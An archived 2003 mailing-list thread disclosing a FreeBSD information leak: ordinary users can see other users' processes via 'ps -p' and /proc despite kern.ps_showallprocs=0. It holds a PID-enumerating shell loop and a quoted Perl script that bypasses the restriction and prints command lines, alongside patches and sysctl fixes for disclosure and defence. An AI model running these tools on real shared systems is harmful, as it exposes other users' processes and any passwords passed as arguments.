PDA

Bekijk Volledige Versie : ps information leak in FreeBSD



Cache
07/01/03, 00:34
Nothing special, lame :)

Hi,

0x01 About
0x02 Practical
0x03 Conclusion
0x04 Install
0x05 End
0x06 Greetz

0x01 About:

Autor: Rafael Lesniak / 05012003 Hannover / cache@irc.pl
Sorry for My English

All: files are on:
http://www.sowatech.com.pl/cache/soft/proc-patch.tar.gz

This is a little information leak. This bug(?) is not dangerous, but
normal user can see all process on the box using ex. /bin/ps;

Affected Systems:
FreeBSD :possible all
OpenBSD :don't known
Linux :don't known
Other :don't known

0x02 Practical:

(I don't use /proc.)

Last login: Sun Jan 5 00:13:01 on ttyv0
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

FreeBSD 4.7-RELEASE (SILENT) #1: Sun Jan 5 00:10:51 GMT 2003

Welcome to FreeBSD!

[cache@silent][ttyv1] ~> grep "FreeBSD:" /usr/src/sys/i386/conf/LINT
# $FreeBSD: src/sys/i386/conf/LINT,v 1.749.2.124 2002/10/05 18:31:47 scottl
Exp

[cache@silent][ttyv1] ~> sysctl -a | grep show
kern.ps_showallprocs: 0
[cache@silent][ttyv1] ~> ps -auxwwwp 101
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 101 0,0 0,2 1020 740 ?? Is 0:12 0:00,01 /usr/sbin/cron

ps [-aCcefhjlmrSTuvwx] [-M core] [-N system] [-O fmt] [-o fmt] [-p pid]
[-t tty] [-U username]

-p Display information associated with the specified process ID.

--- cut ---

0x03 Conclusion:

I hope it is good idea to protect all process information
(any way, for what We need kern.ps_showallprocs?)

[cache@silent][ttyv1] ~> cat info.sh
#!/bin/sh
pid=0;
while x=0; do
/bin/ps -auxwwwp $pid | /usr/bin/grep $pid;
pid=`expr $pid + 1`;
done

--- cut ---

See out.log how it works.

0x04 Install:

$ mkdir /tmp/patch
$ cp proc-patch.tar.gz /tmp/patch
$ cd /tmp/patch
$ tar -zxvf proc-patch.tar.gz
$ su
# patch -p0 < proc.patch

--- cut ---
....
--------------------------
|*** /usr/src/sys/kern/kern_proc.c Tue May 1 13:39:06 2001
|--- /usr/src/sys/kern/kern_proc.c Sun Jan 5 00:18:40 2003
--------------------------
Patching file /usr/src/sys/kern/kern_proc.c using Plan A...
Hunk #1 succeeded at 453.
done
--- cut ---

configure Your kernel, compile, install and thats all.

0x05 End:

I have make this little patch for My FreeBSD box, and this method
doesn't work. May be it is possible to do, but this is not My
skill level );] ...

0x06 Greetz:
kador, Lam3rz, layon, ultor, neutrinka, !pl-bsd, and
all lamerz ...

## Rafal (cache) Lesniak #######
CoSysOp cache /at/ sowatech.com.pl
### http://www.sowatech.com.pl ###

Sean Kelly
07/01/03, 04:36
--G4iJoqBmSsgzjUCe
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> [cache@silent][ttyv1] ~> sysctl -a | grep show
> kern.ps_showallprocs: 0
> [cache@silent][ttyv1] ~> ps -auxwwwp 101
> USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
> root 101 0,0 0,2 1020 740 ?? Is 0:12 0:00,01 /usr/sbin/cron

I've been aware of this problem for a long time, and in fact I made a patch
against 4.6-STABLE which can be applied to correct it. I am not sure how
portable it will be to 4.7-STABLE, but I imagine it would work.

Please see the relevent FreeBSD PR:
http://www.FreeBSD.org/cgi/query-pr.cgi?pr=3Dkern/42065

--=20
Sean Kelly | PGP KeyID: D2E5E296
smkelly@zombie.org | http://www.zombie.org

--G4iJoqBmSsgzjUCe
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (FreeBSD)

iD8DBQE+GfLnPm7A9NLl4pYRAusJAJ9/oIDUI+3W9jcPnT5EiNAKyWgvMACeJBZ+
nwJxU9+B1x1/RHzq3I0kjvw=
=6og6
-----END PGP SIGNATURE-----

--G4iJoqBmSsgzjUCe--

Sean Kelly
08/01/03, 23:58
--3V7upXqbjpZ4EhLz
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Tue, Jan 07, 2003 at 09:18:00AM +0000, Jez Hancock wrote:
=2E..
> It's annoying in that I see a lot of users running mysql with the -u and =
-p options:
>=20
> mysql -u user -p mypassword
>=20
> on the commandline, thinking that this info will not show up in ps listin=
gs when ps
> is run by other users. Ho hum...

As has already been pointed out, this is something that the application
should deal with. Despite this, FreeBSD also has a sysctl knob which will
protect against this.

(2) root:~$ sysctl kern.ps_argsopen=3D0
kern.ps_argsopen: 1 -> 0

This will prevent exactly the problem you describe, by making arguments not
viewable to other users (excluding root). IT also appears to take effect in
/proc, such as /proc/<pid>/cmdline.

This is present in FreeBSD 4.7-STABLE, at least.

--=20
Sean Kelly | PGP KeyID: D2E5E296
smkelly@zombie.org | http://www.zombie.org

--3V7upXqbjpZ4EhLz
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (FreeBSD)

iD8DBQE+HFQkPm7A9NLl4pYRAt0nAKCk5VFEQj2WjA2BZfs39v tUBS3JogCeOAk6
vWFGnPZOT6GKHyrNxeXSiww=
=fRZH
-----END PGP SIGNATURE-----

--3V7upXqbjpZ4EhLz--

Damien Miller
09/01/03, 22:25
Crist J. Clark wrote:
> Any program that asks for a password on the command line should have
> the common decency to overwrite/obfuscate it, along the lines of,
>
> case 'p':
> passwd = optarg;
> optarg = "********";
> break;
>
> So that it doesn't show up in any "ps" output.

That works only for OSs which support argv clobbering - it is by no
means portable and shouldn't be depended on for security.

-d

David M. Wilson
15/01/03, 22:51
On Thu, Jan 09, 2003 at 02:48:30PM +1100, Damien Miller wrote:

> Crist J. Clark wrote:

> >Any program that asks for a password on the command line should have
> >the common decency to overwrite/obfuscate it, along the lines of,

> > case 'p':
> > passwd = optarg;
> > optarg = "********";
> > break;

This code is incorrect, it destroys a temporary pointer that will be
overwritten with the next call to getopt(). For the sake of
completeness, it should be noted that to actually destroy the command
line argument data, one should do something along the lines of:

case 'p':
passwd = strdup(optarg); /* now requires free()ing. */
{
int len = strlen(optarg), i;
for (i = 0; i != len; ++i)
optarg[i] = 0;
}

> That works only for OSs which support argv clobbering - it is by no
> means portable and shouldn't be depended on for security.

This is still correct though. :). Any passwords passed on the command
line are available through a race anyway. Just don't do it(tm).

David.

Jez Hancock
21/01/03, 06:38
On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> This is a little information leak. This bug(?) is not dangerous, but
> normal user can see all process on the box using ex. /bin/ps;
This topic was addressed on freebsd-security list a while back, where
someone also noted that all user process information can be obtained
by regular users even with the sysctl flag 'kern.ps_showallprocs' set simply
by looking at the contents of /proc. The following script was also
posted by someone to demonstrate this:

#!/usr/bin/perl
#
# hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
# author: JohnnyB
#
# a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
# option; an option that hides other users process information.
# (why would they implement such a broken and easily evaded option?)
# [and no this didnt take any skill. its basically an output format]
#
# Tested on FreeBSD 4.5-RC.

print "[USER] [GROUP] [PID] [FILE/ARGS]\n";
opendir(DIR,"/proc");
@procs=readdir(DIR);
closedir(DIR);
foreach ${proc} (@procs){
if(${proc}=~/[0-9]/o){
unshift(@pids, ${proc});
}
}
foreach $pid (@pids){
open(FD, "ls -al /proc/$pid/file|");
while(<FD>){
chomp;
${l}=$_;
${l}=~s/\s{1,}/ /g;
if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){
&ppid(${1},${2},${pid},${3});
}
}
close(FD);
}
exit(0);

sub ppid(){
(${a},${b},${c},${d})=@_;
undef(${str});
undef(${line});
if(-e "/proc/$c/cmdline"){
open(heh,"cat /proc/$c/cmdline|");
@hah=<heh>;
@chars=split(//,@hah[0]);
foreach ${chr} (@chars){
if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\@\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){
${str}.=" ";
}else{
${str}.=${chr};
}
}
${line}.=${a};
while(length(${line})<11){${line}.=" ";} #alignment...
${line}.=" ".${b};
while(length(${line})<23){${line}.=" ";}
${line}.=" ".${c};
while(length(${line})<31){${line}.=" ";}
chop(${str});
if(${d}eq"unknown"){
${str}=~s/\s{1,}//g;
${line}.=" ("."${str}".")";
}else{
${line}.=" "."${str}";
}
@line=split(//,${line});
if(length(${line})>80){
${cntr}=0;
foreach ${char} (@line){
if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)|| (${cntr}==234)){
print "\n"." "x32; #^Anything >, deal with the rollover.
}
print "${char}";
${cntr}++;
}
print "\n";
}
else{
print "${line}\n";
}
return(0);
}
}

I believe someone (last poster in this thread?) also posted a patch on the same
list, freebsd-security.

It's annoying in that I see a lot of users running mysql with the -u and -p options:

mysql -u user -p mypassword

on the commandline, thinking that this info will not show up in ps listings when ps
is run by other users. Ho hum...

Regards,

Jez Hancock

Crist J. Clark
21/01/03, 09:12
On Tue, Jan 07, 2003 at 09:18:00AM +0000, Jez Hancock wrote:
[snip]

> It's annoying in that I see a lot of users running mysql with the -u and -p options:
>
> mysql -u user -p mypassword
>
> on the commandline, thinking that this info will not show up in ps listings when ps
> is run by other users. Ho hum...

Any program that asks for a password on the command line should have
the common decency to overwrite/obfuscate it, along the lines of,

case 'p':
passwd = optarg;
optarg = "********";
break;

So that it doesn't show up in any "ps" output.

Of course, there is still a window of vulnerability before the code is
executed, but any long-lived daemon has no excuse for not doing this.
--
Crist J. Clark | cjclark@alum.mit.edu
| cjclark@jhu.edu
http://people.freebsd.org/~cjc/ | cjc@freebsd.org